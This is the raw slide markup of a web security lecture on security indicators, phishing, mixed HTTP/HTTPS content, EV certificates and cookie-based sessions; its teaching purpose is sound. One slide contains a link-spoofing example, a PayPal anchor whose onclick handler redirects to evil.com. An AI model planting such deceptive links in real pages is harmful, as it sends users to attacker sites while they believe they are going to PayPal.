              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Browser-server mechanisms for managing state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>HTTPS: goals and pitfalls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Network issues and browser protocol handling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Web application security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Application pitfalls and defenses</a:t>
            </a:r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This two-week section could fill an entire course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Security User Interface</a:t>
            </a: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is it safe to type my password?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2531" name="Content Placeholder 4" descr="bank-of-the-west-re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4000"/>
            <a:ext cx="8001000" cy="4287838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B19107E-E21C-473E-B065-BC573B971AEE}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>51</a:t>
            </a:fld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14800" y="2133600"/>
            <a:ext cx="1447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05600" y="5257800"/>
            <a:ext cx="16764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3555" name="Content Placeholder 4" descr="bank-of-the-west-phi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92A480F-211A-4759-A98D-636A288BC7C9}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>52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8382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4579" name="Content Placeholder 4" descr="bank-of-the-west-trick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BDD556-A598-42BD-A218-133BD66078AA}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>53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72200" y="4343400"/>
            <a:ext cx="2057400" cy="1060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2133600"/>
            <a:ext cx="381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" name="Picture 8" descr="vest-up-cl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2" y="2705100"/>
            <a:ext cx="8829675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5603" name="Content Placeholder 4" descr="bank-of-the-west-sketch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577E676-3ED8-45D6-BA6D-3F84037411F9}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>54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35350" y="13716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53200" y="52578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0400" y="54864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6627" name="Content Placeholder 4" descr="bank-of-the-west-p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105650" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
      </p:pic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96D87A-10C6-4B2F-B5DB-DBA046A0F0DF}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>55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86200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60638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80125" y="5513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0" y="1957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Content:  HTTP and HTTPS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1459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Page loads over HTTPS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>but </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>has HTTP content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Network attacker can control page </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>IE:   displays mixed-content dialog to user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Flash files over HTTP loaded with no warning  (!)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Note:   Flash can script the embedding page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Firefox:   red slash over lock icon (no dialog)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Flash files over HTTP do not trigger the slash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Safari: does not detect mixed content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96330" y="6048345"/>
            <a:ext cx="160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current?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Mixed Content:  HTTP and HTTPS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1400840" name="Picture 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect l="33594" t="37500" r="32813" b="40625"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="1752600"/>
            <a:ext cx="327660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4038600"/>
            <a:ext cx="7239000" cy="2133600"/>
            <a:chOff x="576" y="1152"/>
            <a:chExt cx="4560" cy="1344"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1400836" name="Picture 2" descr="D:\HOME\abarth\svn\papers\https\screenshots\origin-contamination.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:srcRect t="55110"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="576" y="1152"/>
              <a:ext cx="456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0841" name="Oval 9"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3497" y="1440"/>
              <a:ext cx="336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42" name="Oval 10"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1584" y="1451"/>
              <a:ext cx="428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30788" y="1611313"/>
            <a:ext cx="3395662" cy="1741487"/>
            <a:chOff x="3169" y="916"/>
            <a:chExt cx="2139" cy="1097"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1400844" name="Picture 12" descr="unspecifiedSecurityflaw"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:srcRect l="42221" t="47212"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3169" y="1104"/>
              <a:ext cx="2139" cy="909"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1400848" name="Text Box 16"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3638" y="916"/>
              <a:ext cx="920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silly dialogs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7" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1412875" y="2590800"/>
            <a:ext cx="7350125" cy="46355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1295400" y="4876800"/>
            <a:ext cx="7239000" cy="45720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 sz="4000"/>
              <a:t>Mixed content and network attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1457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5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>banks: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>after </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>login all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>content </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>over </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTTPS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Developer error:     Somewhere on bank site write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/>
              <a:t>	&lt;script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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>://www.site.com/script.js&gt;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Active network attacker can now hijack any session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buNone/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Better way to include content</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=//www.site.com/script.js&gt;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served </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>over the same protocol as embedding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15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Icon 2.0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="139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r>
              <a:rPr lang="en-US" altLang="ko-KR" u="sng">
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Extended validation (EV) certs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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>
              <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1396740" name="Picture 2" descr="D:\HOME\abarth\svn\papers\https\screenshots\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2438400"/>
            <a:ext cx="751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9674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914400" y="3511550"/>
          <a:ext cx="7391400" cy="984250"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <p:oleObj spid="_x0000_s148482" name="Image" r:id="rId4" imgW="8101587" imgH="1079365" progId="">
              <p:embed/>
            </p:oleObj>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1396745" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="774700" y="5062538"/>
            <a:ext cx="7573963" cy="15525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Prominent security indicator for  EV  certificates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note:  EV site loading content from non-EV site does</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>	   not trigger mixed content warning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Safely browse the web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Users should be able to visit a variety of web sites, without incurring harm:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No stolen information (without user’s permission)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Site A cannot compromise session at Site B</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Secure web applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Applications delivered over the web should have the same security properties we require for stand-alone applications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ideas?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Finally:   the status Bar</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1384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endParaRPr lang="en-US" altLang="ko-KR" dirty="0">
              <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Trivially </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>spoofable</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0">
              <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="80000"/>
              </a:spcBef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&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1">
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>=“http://www.paypal.com/”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	        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onclick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=“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this.href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 = ‘http://www.evil.com/’;”&gt;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     PayPal&lt;/a&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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905000"/>
            <a:ext cx="6477000" cy="762000"/>
            <a:chOff x="528" y="1200"/>
            <a:chExt cx="4080" cy="480"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="138445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87500" r="36719" b="4167"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="720" y="1200"/>
              <a:ext cx="3888" cy="3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</p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1384457" name="AutoShape 9"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="528" y="1344"/>
              <a:ext cx="2688" cy="33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Cookies:   client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/>
          <a:p>
            <a:fld id="{21B46397-9ABA-41D2-BBEA-0C987D291BDA}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>61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ChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="12954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Cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13731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257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Used to store state on user’s machine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1373189" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1447800" y="19970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0" name="AutoShape 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1547813" y="20970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191" name="AutoShape 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="28352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2" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="30638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3" name="Freeform 9"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2190750" y="28305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4" name="AutoShape 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6172200" y="19208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195" name="Line 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="23780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6" name="Text Box 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3626778" y="1905000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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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</p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1373197" name="Line 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="26066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8" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2819400" y="2667000"/>
            <a:ext cx="4800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domain = (who can read)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expires = (when expires)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 = (only over SSL)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1373199" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1447800" y="5029200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0" name="AutoShape 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1547813" y="5129213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201" name="AutoShape 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="5867400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2" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="6096000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3" name="Freeform 19"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2190750" y="5862638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4" name="AutoShape 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6172200" y="4953000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205" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="52800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6" name="Text Box 22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2895600" y="5334000"/>
            <a:ext cx="292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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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808000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cookie:  NAME = VALUE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1373207" name="Text Box 23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3521075" y="6407150"/>
            <a:ext cx="519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/>
              <a:t>HTTP is stateless protocol; cookies add state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373208" name="Line 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="4724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30300" y="3657600"/>
            <a:ext cx="2984500" cy="714375"/>
            <a:chOff x="712" y="2304"/>
            <a:chExt cx="1880" cy="450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1373210" name="Text Box 26"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="712" y="2304"/>
              <a:ext cx="133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expires=NULL:</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US"/>
                <a:t>this session only</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1373211" name="Line 27"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2016" y="2496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99" grpId="0" animBg="1"/>
      <p:bldP spid="1373200" grpId="0" animBg="1"/>
      <p:bldP spid="1373201" grpId="0" animBg="1"/>
      <p:bldP spid="1373202" grpId="0" animBg="1"/>
      <p:bldP spid="1373203" grpId="0" animBg="1"/>
      <p:bldP spid="1373204" grpId="0" animBg="1"/>
      <p:bldP spid="1373205" grpId="0" animBg="1"/>
      <p:bldP spid="1373206" grpId="0"/>
      <p:bldP spid="1373207" grpId="0"/>
      <p:bldP spid="137320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9" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="84582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6" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3810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authentication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810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/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4267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4" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7696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3015" name="Text Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1736725"/>
            <a:ext cx="109061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Browser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4154488" y="1752600"/>
            <a:ext cx="14843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Web Server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7593013" y="1752600"/>
            <a:ext cx="147478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Auth server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00200" y="2222500"/>
            <a:ext cx="2667000" cy="701675"/>
            <a:chOff x="1008" y="1400"/>
            <a:chExt cx="1680" cy="442"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1323020" name="Line 12"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="1008" y="163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1" name="Text Box 13"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1164" y="1400"/>
              <a:ext cx="1328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POST login.cgi</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US"/>
                <a:t>Username &amp; pwd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486400" y="2527300"/>
            <a:ext cx="2106613" cy="396875"/>
            <a:chOff x="3456" y="1592"/>
            <a:chExt cx="1327" cy="250"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1323022" name="Line 14"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3456" y="1842"/>
              <a:ext cx="13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3" name="Text Box 15"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3552" y="1592"/>
              <a:ext cx="103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Validate user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486400" y="3260725"/>
            <a:ext cx="3429000" cy="717550"/>
            <a:chOff x="3456" y="2054"/>
            <a:chExt cx="2160" cy="452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456" y="2054"/>
              <a:ext cx="1392" cy="250"/>
              <a:chOff x="3456" y="2054"/>
              <a:chExt cx="1392" cy="250"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1323024" name="Line 16"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="3456" y="2256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3025" name="Text Box 17"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3763" y="2054"/>
                <a:ext cx="850" cy="2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 type="none" w="lg" len="med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9900"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>auth=val</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1323027" name="Text Box 19"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4877" y="2256"/>
              <a:ext cx="739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Store val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600200" y="3336925"/>
            <a:ext cx="2709863" cy="396875"/>
            <a:chOff x="1008" y="2102"/>
            <a:chExt cx="1707" cy="250"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1323028" name="Line 20"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="1008" y="2304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9" name="Text Box 21"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1098" y="2102"/>
              <a:ext cx="161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Set-cookie: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1800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sp>
        <p:nvSpPr>
